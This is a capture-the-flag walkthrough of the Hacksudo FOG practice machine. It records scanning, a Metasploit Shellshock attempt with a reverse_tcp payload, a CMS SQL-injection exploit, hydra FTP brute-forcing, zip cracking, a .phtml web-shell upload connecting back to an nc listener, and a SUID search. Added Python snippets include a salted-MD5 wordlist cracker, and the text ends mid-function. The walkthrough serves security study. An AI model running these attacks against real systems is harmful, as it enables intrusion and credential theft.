Hacksudo FOG
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.83.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:ec:15:1e 1 60 PCS Systemtechnik GmbH
192.168.56.210 08:00:27:9e:f9:29 1 60 PCS Systemtechnik GmbH
Using the netdiscover tool bundled with Kali Linux, the target host's IP address is identified as 192.168.56.210.
Nmap scan
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.210 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-22 08:48 EST
Nmap scan report for bogon (192.168.56.210)
Host is up (0.000065s latency).
Not shown: 65524 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp Pure-FTPd
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 62:ce:1b:7d:4e:24:0f:8a:c1:c9:ea:c4:1e:21:a7:f3 (RSA)
| 256 92:04:5a:0a:86:62:b3:ba:00:f3:82:6a:c9:8d:ae:6d (ECDSA)
|_ 256 74:c5:7c:9f:8d:06:ee:0c:54:5e:65:b2:30:42:98:49 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Hacksudo FOG
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 36857/tcp mountd
| 100005 1,2,3 50706/udp6 mountd
| 100005 1,2,3 59321/udp mountd
| 100005 1,2,3 60853/tcp6 mountd
| 100021 1,3,4 37499/tcp6 nlockmgr
| 100021 1,3,4 42629/tcp nlockmgr
| 100021 1,3,4 44023/udp6 nlockmgr
| 100021 1,3,4 48943/udp nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
443/tcp open http Apache httpd 2.4.38
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Hacksudo FOG
2049/tcp open nfs_acl 3 (RPC #100227)
3306/tcp open mysql MySQL 5.5.5-10.3.27-MariaDB-0+deb10u1
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.3.27-MariaDB-0+deb10u1
| Thread ID: 90
| Capabilities flags: 63486
| Some Capabilities: LongColumnFlag, Support41Auth, SupportsCompression, Speaks41ProtocolOld, ConnectWithDatabase, IgnoreSigpipes, ODBCClient, SupportsLoadDataLocal, SupportsTransactions, Speaks41ProtocolNew, InteractiveClient, FoundRows, DontAllowDatabaseTableColumn, IgnoreSpaceBeforeParenthesis, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
| Status: Autocommit
| Salt: Xh$tB)D\!/h@EzY.x49^
|_ Auth Plugin Name: mysql_native_password
36857/tcp open mountd 1-3 (RPC #100005)
41031/tcp open mountd 1-3 (RPC #100005)
42629/tcp open nlockmgr 1-4 (RPC #100021)
55275/tcp open mountd 1-3 (RPC #100005)
MAC Address: 08:00:27:9E:F9:29 (Oracle VirtualBox virtual NIC)
Service Info: Host: hacksudo.hacksudo; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.41 seconds
Get Access
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ ftp 192.168.56.210
Connected to 192.168.56.210.
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 1 of 50 allowed.
220-Local time is now 08:51. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
Name (192.168.56.210:kali): anonymous
331 User anonymous OK. Password required
Password:
530 Login authentication failed
ftp: Login failed
ftp> quit
221-Goodbye. You uploaded 0 and downloaded 0 kbytes.
221 Logout.
Check whether this FTP server software has any exploitable vulnerabilities:
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ searchsploit Pure-FTPd
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Pure-FTPd - External Authentication Bash Environment Variable Code Injection (Metasploit) | linux/remote/34862.rb
Pure-FTPd 1.0.21 (CentOS 6.2 / Ubuntu 8.04) - Null Pointer Dereference Crash (PoC) | linux/dos/20479.pl
Pure-FTPd 1.0.48 - Remote Denial of Service | multiple/dos/49105.py
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ msfconsole
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *
=[ metasploit v6.2.9-dev ]
+ -- --=[ 2230 exploits - 1177 auxiliary - 398 post ]
+ -- --=[ 867 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Open an interactive Ruby terminal with
irb
msf6 > search pure-ftpd
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/ftp/pureftpd_bash_env_exec 2014-09-24 excellent Yes Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)
Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/ftp/pureftpd_bash_env_exec
msf6 > use exploit/multi/ftp/pureftpd_bash_env_exec
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/ftp/pureftpd_bash_env_exec) > show options
Module options (exploit/multi/ftp/pureftpd_bash_env_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPATH /bin yes Target PATH for binaries used by the CmdStager
RPORT 21 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Linux x86
msf6 exploit(multi/ftp/pureftpd_bash_env_exec) > set RHOSTS 192.168.56.210
RHOSTS => 192.168.56.210
msf6 exploit(multi/ftp/pureftpd_bash_env_exec) > set SRVHOST 192.168.56.206
SRVHOST => 192.168.56.206
msf6 exploit(multi/ftp/pureftpd_bash_env_exec) > set LHOST 192.168.56.206
LHOST => 192.168.56.206
msf6 exploit(multi/ftp/pureftpd_bash_env_exec) > set LPORT 5555
LPORT => 5555
msf6 exploit(multi/ftp/pureftpd_bash_env_exec) > run
[*] Started reverse TCP handler on 192.168.56.206:5555
[*] 192.168.56.210:21 - Command Stager progress - 60.24% done (500/830 bytes)
[*] 192.168.56.210:21 - Command Stager progress - 100.60% done (835/830 bytes)
[*] Exploit completed, but no session was created.
msf6 exploit(multi/ftp/pureftpd_bash_env_exec) >
That did not succeed, so set the FTP service aside for now.
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ curl http://192.168.56.210/
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<link rel="stylesheet" href="style.css">
<title>Hacksudo FOG</title>
</head>
<body style="background-color:black;">
<section>
<video src="smoke.mp4" autoplay muted></video>
<h1>
<span>H</span>
<span>A</span>
<span>C</span>
<span>K</span>
<span>S</span>
<span>U</span>
<span>D</span>
<span>O</span>
<br>
<span>F</span>
<span>O</span>
<span>G</span>
</h1>
<center><marquee><a href="index1.html">FOG TEAM click here </a></marquee></center>
</section>
</body>
</html>
The returned page contains a hyperlink to index1.html; visit it:
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ curl http://192.168.56.210/index1.html
<html>
<title>hacksudo-fogTEAM
</title>
<body style="background-color:black;">
<center><h1><font color=white>Hacksudo:FOG-TEAM</font></h1></center>
<img src="fog.jpg" alt="Fog Project" width="1300" height="600"> </body>
<!-- caesar-cipher ==? https://github.com/hacksudo/SoundStegno --!>
<!-- box author : hacksudo --!>
</html>
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ gobuster dir -u http://192.168.56.210 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.210
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/11/22 09:06:17 Starting gobuster in directory enumeration mode
===============================================================
/cms (Status: 301) [Size: 314] [--> http://192.168.56.210/cms/]
/fog (Status: 301) [Size: 314] [--> http://192.168.56.210/fog/]
/server-status (Status: 403) [Size: 279]
Progress: 218693 / 220561 (99.15%)===============================================================
2022/11/22 09:08:28 Finished
===============================================================
The /cms directory is identified. Visiting it, the returned page reveals the target site's CMS:
CMS Made Simple version 2.2.5
Check whether there are any related vulnerabilities:
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ searchsploit CMS Made Simple 2.2.5
-------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------- ---------------------------------
CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution | php/webapps/44976.py
CMS Made Simple < 2.2.10 - SQL Injection | php/webapps/46635.py
-------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
The first exploit script requires a username and password up front, so the second one can be tried first.
But first, scan the target host for other files:
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ gobuster dir -u http://192.168.56.210 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.210
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: php,txt,html,sh
[+] Timeout: 10s
===============================================================
2022/11/22 20:53:23 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 853]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/index.php (Status: 302) [Size: 0] [--> /fog/index.php]
/index1.html (Status: 200) [Size: 329]
/cms (Status: 301) [Size: 314] [--> http://192.168.56.210/cms/]
/dict.txt (Status: 200) [Size: 1798]
/dict.txt was found, which should be a dictionary file. Could it be a password dictionary? Download it and take a look first:
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ wget http://192.168.56.210/dict.txt
It looks like a password dictionary.
Next, try the exploit script found earlier:
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ searchsploit -m php/webapps/46635.py
Exploit: CMS Made Simple < 2.2.10 - SQL Injection
URL: https://www.exploit-db.com/exploits/46635
Path: /usr/share/exploitdb/exploits/php/webapps/46635.py
File Type: Python script, ASCII text executable
This is a Python 2 script; run it:
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ python2 46635.py -u http://192.168.56.210/cms/
Traceback (most recent call last):
File "46635.py", line 12, in <module>
from termcolor import colored
ImportError: No module named termcolor
Python 2 on Kali Linux does not have the termcolor module, so the script was ported to Python 3. Running it produced another error:
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ python exploit.py -u http://192.168.56.210/cms --crack -w dict.txt
[+] Salt for password found: 21ca796356464b52
[+] Username found: hacksudo
[+] Email found: info@hacksudo.com
[+] Password found: cd658361db0ee541e7fc728aba5570d3
[*] Try: hacker
Traceback (most recent call last):
File "/home/kali/Vulnhub/Hacksudo_FOG/exploit.py", line 184, in <module>
crack_password()
File "/home/kali/Vulnhub/Hacksudo_FOG/exploit.py", line 56, in crack_password
if hashlib.md5(str(salt) + line).hexdigest() == password:
TypeError: Strings must be encoded before hashing
So the username has been found, and the hashed password as well; the next step is to crack the password. Modify the code again to encode the string as UTF-8 before hashing:
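The TypeError in the traceback above comes from the Python 2 to Python 3 port: hashlib only accepts bytes, and the script's crack_password() hashes str(salt) + line directly. The following is an added illustration (not the exploit-db script and not the author's modified exploit.py) of the salted-MD5 check with the encoding fixed; the salt and hash values it uses are constructed demo values, not the ones recovered from the target.

```python
import hashlib
import hmac


def salted_md5_hex(salt: str, candidate: str) -> str:
    """Return md5(salt + candidate) as hex, encoding the text to bytes first.

    Python 2 `str` was already a byte string, so hashlib.md5(salt + line)
    worked there. In Python 3 `str` is Unicode text and hashlib only accepts
    bytes, which is exactly the "Strings must be encoded before hashing"
    TypeError shown in the traceback above.
    """
    return hashlib.md5((salt + candidate).encode("utf-8")).hexdigest()


def python2_style_call_fails(salt: str, candidate: str) -> bool:
    """Reproduce the original bug: passing str straight to hashlib raises TypeError."""
    try:
        hashlib.md5(salt + candidate)
    except TypeError:
        return True
    return False


def verify_candidate(salt: str, stored_hex: str, candidate: str) -> bool:
    """Compare the recomputed hash with the stored one in constant time."""
    return hmac.compare_digest(salted_md5_hex(salt, candidate), stored_hex.lower())


def first_match(salt: str, stored_hex: str, lines):
    """Return the first wordlist entry whose salted MD5 equals stored_hex, else None.

    Lines read from a file keep their trailing newline; a port that hashes
    `line` unchanged never matches even with the encoding fixed, so the
    newline is stripped before hashing.
    """
    for line in lines:
        word = line.rstrip("\r\n")
        if verify_candidate(salt, stored_hex, word):
            return word
    return None


if __name__ == "__main__":
    # Constructed demo values, not the salt/hash from the target above.
    demo_salt, demo_word = "a", "bc"
    demo_hash = salted_md5_hex(demo_salt, demo_word)
    print(python2_style_call_fails(demo_salt, demo_word))      # True
    print(first_match(demo_salt, demo_hash, ["x\n", "bc\n"]))  # bc
```

A single unsalted or salted MD5 round is cheap to recompute, which is why a leaked hash plus a short wordlist is checked in seconds; a CMS that stores passwords this way should be migrated to a slow, per-user-salted scheme such as bcrypt or Argon2.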
Running it again, this time there is no error, but the password was not cracked:
[+] Salt for password found: 21ca796356464b52
[+] Username found: hacksudo
[+] Email found: info@hacksudo.com
[+] Password found: cd658361db0ee541e7fc728aba5570d3
At this point I did not know how to proceed. After looking at other people's approaches, it turns out this dictionary file is for FTP, and the guess is that hacksudo is also the FTP username, no wonder it could never be cracked!
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ hydra -l hacksudo -P dict.txt ftp://192.168.56.210
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-11-22 21:43:08
[DATA] max 16 tasks per 1 server, overall 16 tasks, 196 login tries (l:1/p:196), ~13 tries per task
[DATA] attacking ftp://192.168.56.210:21/
[21][ftp] host: 192.168.56.210 login: hacksudo password: hackme
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ ftp 192.168.56.210
Connected to 192.168.56.210.
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 1 of 50 allowed.
220-Local time is now 21:43. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
Name (192.168.56.210:kali): hacksudo
331 User hacksudo OK. Password required
Password:
230 OK. Current directory is /
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Extended Passive mode OK (|||6456|)
150 Accepted data connection
drwxr-xr-x 3 1002 ftpgroup 4096 May 7 2021 .
drwxr-xr-x 3 1002 ftpgroup 4096 May 7 2021 ..
-rw-r--r-- 1 33 33 389 May 7 2021 flag1.txt
drwxr-xr-x 2 0 0 4096 May 6 2021 hacksudo_ISRO_bak
226-Options: -a -l
226 4 matches total
ftp> get hacksudo_ISRO_bak
local: hacksudo_ISRO_bak remote: hacksudo_ISRO_bak
229 Extended Passive mode OK (|||65479|)
550 I can only retrieve regular files
ftp> get flag1.txt
local: flag1.txt remote: flag1.txt
229 Extended Passive mode OK (|||54066|)
150 Accepted data connection
100% |*********************************************************************************| 389 675.94 KiB/s 00:00 ETA
226-File successfully transferred
226 0.001 seconds (measured here), 0.64 Mbytes per second
389 bytes received in 00:00 (628.94 KiB/s)
ftp> cd hacksudo_ISRO_bak
250 OK. Current directory is /hacksudo_ISRO_bak
ftp> ls -alh
229 Extended Passive mode OK (|||5935|)
150 Accepted data connection
drwxr-xr-x 2 0 0 4096 May 6 2021 .
drwxr-xr-x 3 1002 ftpgroup 4096 May 7 2021 ..
-rw-r--r-- 1 0 0 63 May 5 2021 authors.txt
-rw-r--r-- 1 0 0 0 May 6 2021 installfog
-rw-r--r-- 1 0 0 1573833 May 6 2021 secr3tSteg.zip
226-Options: -a -l
226 5 matches total
ftp> get authors.txt
local: authors.txt remote: authors.txt
229 Extended Passive mode OK (|||57754|)
150 Accepted data connection
100% |*********************************************************************************| 63 98.75 KiB/s 00:00 ETA
226-File successfully transferred
226 0.001 seconds (measured here), 101.87 Kbytes per second
63 bytes received in 00:00 (91.14 KiB/s)
ftp> get installfog
local: installfog remote: installfog
229 Extended Passive mode OK (|||46179|)
150 Accepted data connection
0 0.00 KiB/s
226 File successfully transferred
ftp> get secr3tSteg.zip
local: secr3tSteg.zip remote: secr3tSteg.zip
229 Extended Passive mode OK (|||11902|)
150-Accepted data connection
150 1536.9 kbytes to download
100% |*********************************************************************************| 1536 KiB 139.45 MiB/s 00:00 ETA
226-File successfully transferred
226 0.010 seconds (measured here), 155.05 Mbytes per second
1573833 bytes received in 00:00 (137.17 MiB/s)
ftp> quit
221-Goodbye. You uploaded 0 and downloaded 1538 kbytes.
221 Logout.
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ cat flag1.txt
great you done step 1
___ ___ _ __ __ _ _ __ __ _| |_ _ _| | __ _| |_(_) ___ _ __
/ __/ _ \| '_ \ / _` | '__/ _` | __| | | | |/ _` | __| |/ _ \| '_ \
| (_| (_) | | | | (_| | | | (_| | |_| |_| | | (_| | |_| | (_) | | | |
\___\___/|_| |_|\__, |_| \__,_|\__|\__,_|_|\__,_|\__|_|\___/|_| |_|
|___/
www.hacksudo.com
Got the first flag.
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ cat installfog
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ cat authors.txt
hacksudo CEO & Founder = vishal waghmare <vishal@hacksudo.com>
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ unzip secr3tSteg.zip
Archive: secr3tSteg.zip
[secr3tSteg.zip] hacksudoSTEGNO.wav password:
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ zip2john secr3tSteg.zip > zip_hashes
ver 2.0 efh 5455 efh 7875 secr3tSteg.zip/hacksudoSTEGNO.wav PKZIP Encr: TS_chk, cmplen=1573432, decmplen=1965596, crc=8B4A9445 ts=9A86 cs=9a86 type=8
ver 1.0 efh 5455 efh 7875 ** 2b ** secr3tSteg.zip/secr3t.txt PKZIP Encr: TS_chk, cmplen=35, decmplen=23, crc=DD73D9B0 ts=9AB0 cs=9ab0 type=0
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ ls
46635.py exploit.py fog.webp my_password_crack.py smoke.mp4 sql_exploit.py
authors.txt flag1.txt hashes nmap_full_scan SoundStegno-main zip_hashes
dict.txt fog.jpg installfog secr3tSteg.zip SoundStegno-main.zip
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ john zip_hashes /usr/share/wordlists/rockyou.txt
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
fooled (secr3tSteg.zip)
1g 0:00:00:00 DONE 2/3 (2022-11-22 21:47) 12.50g/s 2750Kp/s 2750Kc/s 2750KC/s Sportses..vikramed
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
The password of secr3tSteg.zip has been cracked.
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ unzip secr3tSteg.zip
Archive: secr3tSteg.zip
[secr3tSteg.zip] hacksudoSTEGNO.wav password:
inflating: hacksudoSTEGNO.wav
extracting: secr3t.txt
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ ls
46635.py exploit.py fog.webp installfog secr3tSteg.zip SoundStegno-main zip_hashes
authors.txt flag1.txt hacksudoSTEGNO.wav my_password_crack.py secr3t.txt SoundStegno-main.zip
dict.txt fog.jpg hashes nmap_full_scan smoke.mp4 sql_exploit.py
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ cat secr3t.txt
localhost = server IP
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG/SoundStegno-main]
└─$ python ExWave.py -f ../hacksudoSTEGNO.wav
_ _ _ _ _ __ __
| || (_)__| |__| |___ _ _ \ \ / /_ ___ _____
| __ | / _` / _` / -_) ' \ \ \/\/ / _` \ V / -_)
|_||_|_\__,_\__,_\___|_||_|_\_/\_/\__,_|\_/\___|
|___|v1.0 www.techchip.net
Visit for more tutorials : www.youtube.com/techchipnet
Hide your text message in wave audio file like MR.ROBOT
Please wait...
Your Secret Message is: Shift by 3
ABCDEFGHIJKLMNOPQRSTUVWXYZ
DEFGHIJKLMNOPQRSTUVWXYZABC
zzzz.orfdokrvw/irj Xvhuqdph=irj:sdvvzrug=kdfnvxgrLVUR
Since http://192.168.56.210/index1.html mentioned the Caesar cipher, an online site was used to decrypt it here (shift of 3) (https://www.qqxiuzi.cn/bianma/kaisamima.php).
After decryption:
wwww.localhost/fog Username=fog:password=hacksudoISRO
Use this password to log in to the CMS again.
The login succeeds. Then try the remote code execution exploit, which fails.
Still, look for an entry point to upload shell.php; there is filtering, so try the .phtml extension, which uploads successfully.
Visit that page:
Successfully got a shell.
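The message in the wav file gives the shifted alphabet and the hint "Shift by 3", which is a plain Caesar cipher. Instead of an online decoder, the decoding can be done locally; the following is an added example (not part of the original write-up or the SoundStegno tool) that shifts only ASCII letters, leaves punctuation such as "/", "=" and ":" untouched, and also tries all 26 shifts for the case where no hint is given. CIPHERTEXT is the string recovered above.

```python
import string

# The shifted string printed by ExWave.py above.
CIPHERTEXT = "zzzz.orfdokrvw/irj Xvhuqdph=irj:sdvvzrug=kdfnvxgrLVUR"


def caesar_shift(text: str, shift: int) -> str:
    """Shift every ASCII letter by `shift` positions (mod 26), preserving case.

    Digits, punctuation and whitespace pass through unchanged, which is what
    keeps the '/', '=', ':' and '.' of the hidden message intact.
    """
    out = []
    for ch in text:
        if "a" <= ch <= "z":
            out.append(chr((ord(ch) - ord("a") + shift) % 26 + ord("a")))
        elif "A" <= ch <= "Z":
            out.append(chr((ord(ch) - ord("A") + shift) % 26 + ord("A")))
        else:
            out.append(ch)
    return "".join(out)


def caesar_decode(ciphertext: str, shift: int = 3) -> str:
    """Undo an encryption that shifted letters forward by `shift` (the hint says 3)."""
    return caesar_shift(ciphertext, -shift)


def alphabet_table(shift: int):
    """The two alphabet rows the tool printed: plain row and row shifted by `shift`."""
    upper = string.ascii_uppercase
    return upper, upper[shift:] + upper[:shift]


def all_shifts(ciphertext: str):
    """Every candidate plaintext keyed by shift; a Caesar key space is only 26 wide,
    so when no hint is given the reader simply picks the row that looks like language."""
    return {k: caesar_shift(ciphertext, -k) for k in range(26)}


if __name__ == "__main__":
    print(alphabet_table(3))
    print(caesar_decode(CIPHERTEXT))  # wwww.localhost/fog Username=fog:password=hacksudoISRO
    for k, candidate in all_shifts(CIPHERTEXT).items():
        print(f"{k:2d}: {candidate}")
```

The full-shift listing makes the security point concrete: a Caesar cipher provides obfuscation, not confidentiality, since every possible key can be tried by inspection.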
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.210] 33112
Linux hacksudo 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64 GNU/Linux
22:05:35 up 1:21, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@hacksudo:/$ ls
ls
bin ftphome lib lost+found proc srv usr
boot home lib32 media root sys var
dev initrd.img lib64 mnt run tftpboot.prev vmlinuz
etc initrd.img.old libx32 opt sbin tmp vmlinuz.old
www-data@hacksudo:/$ cd /home
cd /home
www-data@hacksudo:/home$ ls -alh
ls -alh
total 24K
drwxr-xr-x 6 root root 4.0K May 8 2021 .
drwxr-xr-x 20 root root 4.0K May 9 2021 ..
drwxr-xr-x 3 root root 4.0K May 7 2021 backups
drwxr-xr-x 2 root root 4.0K May 8 2021 fogDBbackups
drwxr-x--- 4 1001 1001 4.0K May 6 2021 fogproject
drwxr-x--- 5 isro isro 4.0K May 13 2021 isro
www-data@hacksudo:/home$
www-data@hacksudo:/var/www$ ls
ls
flag2.txt html
www-data@hacksudo:/var/www$ cat flag2.txt
cat flag2.txt
you successfully crack web and got shell access!!!
_ _ _ _
___ ___ _ __ __ _ _ __ __ _| |_ _ _| | __ _| |_(_) ___ _ __
/ __/ _ \| '_ \ / _` | '__/ _` | __| | | | |/ _` | __| |/ _ \| '_ \
| (_| (_) | | | | (_| | | | (_| | |_| |_| | | (_| | |_| | (_) | | | |
\___\___/|_| |_|\__, |_| \__,_|\__|\__,_|_|\__,_|\__|_|\___/|_| |_|
step 2 done.
_ ____
___| |_ ___ _ __ |___ \
/ __| __/ _ \ '_ \ __) |
\__ \ || __/ |_) | / __/
|___/\__\___| .__/ |_____|
|_|
www-data@hacksudo:/var/www$
Privilege escalation
look is found to have the SUID bit set:
www-data@hacksudo:/var/www$ find / -type f -perm -4000 2>/dev/null
find / -type f -perm -4000 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/sbin/mount.nfs
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/look
/usr/bin/mount
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/su
/usr/bin/passwd
www-data@hacksudo:/var/www$
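The setuid listing above is exactly the kind of inventory a defender should compare against a known-good baseline: every entry except /usr/bin/look is a standard Debian setuid program, and look is the odd one out. The following is an added example (not from the write-up) that parses such a find listing, diffs it against a baseline, and can also produce a fresh listing from a live filesystem. The baseline set is an assumption made for this example; build a real one from a clean image of the same distribution.

```python
import os
import stat

# Constructed sample: the setuid listing from the www-data shell above, including the
# echoed command line that a pty-spawned shell prints back before the results.
FIND_OUTPUT = """\
find / -type f -perm -4000 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/sbin/mount.nfs
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/look
/usr/bin/mount
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/su
/usr/bin/passwd
"""

# Assumed baseline of setuid files on a stock Debian 10 install (hypothetical for this
# example). A real baseline should be generated from a clean image with scan_setuid().
BASELINE = frozenset({
    "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/sbin/mount.nfs",
    "/usr/bin/gpasswd",
    "/usr/bin/umount",
    "/usr/bin/sudo",
    "/usr/bin/chfn",
    "/usr/bin/mount",
    "/usr/bin/chsh",
    "/usr/bin/newgrp",
    "/usr/bin/su",
    "/usr/bin/passwd",
})

# Pseudo-filesystems that are pointless (and slow) to walk on a live host.
SKIP_DIRS = ("/proc", "/sys", "/dev")


def parse_find_output(text: str):
    """Keep only absolute paths; drop echoed prompts, commands and blank lines."""
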